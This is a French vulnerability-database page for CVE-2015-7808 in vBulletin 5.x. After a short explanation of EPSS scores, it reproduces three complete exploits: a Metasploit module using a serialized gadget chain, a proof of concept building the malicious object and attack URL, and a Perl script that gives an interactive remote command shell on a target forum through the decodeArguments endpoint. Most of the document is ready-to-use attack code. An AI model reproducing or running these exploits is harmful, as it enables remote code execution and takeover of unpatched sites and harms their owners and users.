CVE-2015-7808 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution', 'Description' => %q{ This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9 }, 'Platform' => 'php', 'License' => MSF_LICENSE, 'Author' => [ 'Netanel Rubin', # reported by 'cutz', # original exploit 'Julien (jvoisin) Voisin', # metasploit module ], 'Payload' => { 'BadChars' => "\x22", }, 'References' => [ ['CVE', '2015-7808'], ['EDB', '38629'], ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'], ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] ], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Targeting', { 'auto' => true } ], ['vBulletin 5.0.X', {'chain' => 'vB_Database'}], ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], ], 'DisclosureDate' => 'Nov 4 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) ]) end def check begin res = send_request_cgi({ 'uri' => target_uri.path }) if (res && res.body.include?('vBulletin Solutions, Inc.')) if res.body.include?("Version 5.0") @my_target = targets[1] if target['auto'] return Exploit::CheckCode::Appears elsif res.body.include?("Version 5.1") @my_target = targets[2] if target['auto'] return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe end end def exploit print_status("Trying to inferprint the instance...") @my_target = target check_code = check unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance") end if @my_target.nil? || @my_target['auto'] fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s chain << ':"' chain << @my_target["chain"] chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:' chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}" chain = Rex::Text.uri_encode(chain) chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'), 'vars_get' => { 'arguments' => chain }, 'encode_params' => false, }) end end

# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit # Date: Nov 4th, 2015 # Exploit Author: hhjj # Vendor Homepage: http://www.vbulletin.com/ # Version: 5.1.x # Tested on: Debian # CVE : # I did not discover this exploit, leaked from the IoT. # Build the object php << 'eof' <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = 'phpinfo'; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "\n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D #Then hit decodeArguments with your payload : http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit #[+] Product: vbulletin #[+] Vendor: http://vbulletin.com #[+] Vulnerable Version(s): Vbulletin 5.x # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/reza.espargham # Special Thanks : Mohammad Emad system(($^O eq 'MSWin32') ? 'cls' : 'clear'); use LWP::UserAgent; use LWP::Simple; $ua = LWP::UserAgent ->new; print "\n\t Enter Target [ Example:http://target.com/forum/ ]"; print "\n\n \t Enter Target : "; $Target=<STDIN>; chomp($Target); $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}'); $source=$response->decoded_content; if (($source =~ m/4276158464/i)) { $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}'); $user=$response->decoded_content; chomp($user); print "\n Target Vulnerable ;)\n"; while($cmd=="exit") { print "\n\n$user\$ "; $cmd=<STDIN>; chomp($cmd); if($cmd =~ m/exit/i){exit 0;} $len=length($cmd); $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}'); print "\n".$response->decoded_content; } }else{print "\ntarget is not Vulnerable\n\n"}